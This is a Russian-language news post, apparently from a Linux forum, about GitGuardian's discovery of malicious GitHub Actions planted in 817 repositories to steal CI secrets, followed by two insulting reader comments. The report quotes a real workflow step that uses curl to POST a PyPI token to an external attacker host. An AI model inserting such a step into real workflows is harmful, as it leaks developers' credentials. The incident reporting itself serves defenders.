Исследователи GitGuardian обнаружили масштабную атаку на GitHub

0

2

Специалисты компании GitGuardian зафиксировали масштабную целенаправленную атаку на пользователей GitHub. В результате злоумышленники получили доступ к 327 аккаунтам, через которые было внедрено вредоносное поведение в 817 репозиториев. Они подменяли GitHub Actions — автоматизированные скрипты, используемые в процессе CI/CD — вставляя вредоносные обработчики, собирающие чувствительную информацию.

В ходе атаки произошла утечка как минимум 3325 секретов, включая ключи доступа к сервисам PyPI, GitHub, NPM, DockerHub и различным облачным хранилищам. Данные передавались через переменные окружения, используемые в процессе автоматической сборки и тестирования проектов.

GitHub Actions позволяют разработчикам автоматизировать задачи вроде запуска тестов, публикации релизов или обработки issues. Злоумышленники маскировали вредоносный код под якобы безопасный обработчик под названием «Github Actions Security». Внутри него скрывалась команда curl, отправлявшая значения переменных окружения на внешний сервер при запуске workflow.

Пример вредоносной вставки:

  run: |
    curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page

Атака была обнаружена после анализа подозрительной активности вокруг пакета FastUUID — Python-обёртки для Rust-библиотеки UUID. Пакет за неделю скачали почти 1,2 млн раз, и он является зависимостью проекта LiteLLM, популярность которого на PyPI превышает 5 миллионов загрузок в неделю. Вредоносный коммит был добавлен 2 сентября от имени мэйнтейнера FastUUID и включал отправку токена PyPI на внешний ресурс.

К счастью, инцидент удалось пресечь до публикации вредоносной версии FastUUID — признаков модификации или загрузки заражённого пакета в PyPI не выявлено. Однако аналогичные вредоносные обработчики были найдены ещё в 816 репозиториях. Владельцы проектов, а также представители GitHub, PyPI, NPM и DockerHub уже уведомлены о произошедшем.

К текущему моменту вредоносные коммиты удалены примерно в 100 репозиториях, а в базе GitHub всё ещё числится 671 коммит, содержащий вредоносный GitHub Action.

>>> Подробности (OpenNet)

Ссылка

← 1 2 →

Ответ на: комментарий от zabbal 08.09.25 21:27:57 MSK

детка, представь себе, что я раньше даже пользовалась гитхабом. правда, после покупки его мелкософтом я всё удалила и там остался только пустой профиль. но я очень хорошо (и даже с программной точки зрения) знаю, что такое эти «токены». хотя искренне не понимаю, нафига, когда есть обычные RSA ключи, но можно забить.

а пипл тут при том, что через него и пистонопомойки ваш индус засунул свой троян в сорцы на гитхабе. но я тебя тут просвещать не буду. читай тред.

Iron_Bug ★★★★★
(08.09.25 21:30:51 MSK)
Последнее исправление: Iron_Bug 08.09.25 21:31:50 MSK (всего исправлений: 1)

Ответ на: комментарий от Iron_Bug 08.09.25 21:30:51 MSK

через него и пистонопомойки ваш индус засунул свой троян в сорцы на гитхабе

Даже в климаксе нельзя быть до такой степени тупой. Этот «индус» (в статье нет атрибуции - это ещё одна выдумка идиотов) стянул доступ к PyPI среди прочего - то есть это цель атаки, а не средство. Прочитай уже статью которую комментируешь. Понимаю что тебе нечем, но ты хоть попробуй.

zabbal ★★★★☆
(08.09.25 21:37:09 MSK)

Похожие темы